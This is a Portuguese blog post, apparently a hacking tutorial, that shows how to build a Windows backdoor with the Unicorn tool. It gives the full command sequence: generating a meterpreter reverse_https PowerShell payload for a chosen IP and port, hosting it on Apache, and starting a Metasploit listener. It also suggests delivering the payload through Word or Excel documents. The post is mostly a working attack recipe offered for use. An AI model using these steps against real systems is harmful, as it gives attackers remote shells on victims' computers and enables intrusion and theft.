Backdoor com Unicorn

Publicado por Igor Matsunaga em

Criando o Backdoor

Para criar nosso backdoor usaremos uma incrível ferramenta desenvolvida pela trustedsec nomeada de Unicorn.

O Magic Unicorn é uma ferramenta simples para usar um ataque de downgrade do PowerShell e injetar o shellcode diretamente na memória. Baseado nos ataques de powershell de Matthew Graeber e na técnica de desvio de powershell apresentada por David Kennedy (TrustedSec) e Josh Kelly no Defcon 18.

Download da Ferramenta Unicorn

Abra um terminal e digite o comando abaixo:

# git clone https://github.com/trustedsec/unicorn.git

Navegue até a pasta onde foi salvo o arquivo:

# cd unicorn\

Digite o comando abaixo para listar os arquivos na pasta.

# ls

Utilizando o Unicorn

Execute o script unicorn.py

# python unicorn.py ou ./unicorn.py

Vários exemplos são mostrados na imagem acima, mas para realizar o nosso ataque utilizaremos a opção meterpreter. Mas antes caso desconheça seu IP utilize o comando.

# ifconfig

Agora que confirmamos nosso IP, utilizaremos a sintaxe a seguir. python unicorn.py <tipo de conexão> <IP> <Porta>

 # python unicorn.py windows/meterpreter/reverse_https 10.0.2.15 4444

Foram gerados 2 arquivos, powershell_attack e unicon.rc. No arquivo de texto você encontra todo o código necessário para injetar o ataque na memória. O interessante é utilizar algum software que suporte injeção de comandos remotos de algum tipo, como o excel/ word, existe uma gama enorme que possa ser utilizada. O unicorn.rc ira configurar o metasploit para ativar o nosso ouvinte.

Se vê também algumas instruções de uso.

logoNSW

Iniciando o Apache

Os arquivos foram criados dentro da pasta do unicorn.

Ainda dentro da pasta do unicorn, moveremos o arquivo powershell_attack.txt para nosso servidor apache com o comando:

# mv powershell_attack.txt /var/www/html

Realizado este procedimento podemos iniciar o apache com o comando:

# service apache2 start

Iniciando o Ouvinte

O Metasploit usa o PostgreSQL como banco de dados, portanto precisamos o inicia-lo primeiro com o comando:

# service postgresql start

O proximo passa agora será inicializa-lo no Metasploit com o comando.

# msfdb init

Agora que o serviço PostgreSQL está em execução é o banco de dados foi inicializado, iremos utilizar o unicorn.rc com o comando:

# msfconsole -r unicorn.rc

O processo está pronto e aguardando a conexão.

Criação do backdoor e criação do ouvinte.

Que a segurança esteja com você!!!

[products limit=”3″ columns=”4″ orderby=”date” order=”DESC” ids=”241,239,235″]

Igor Matsunaga

Diretor Técnico da NSWorld, entusiasta da área hacking a mais de 6 anos, hacker ético, formado em Segurança da Informação.

0 comentário

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *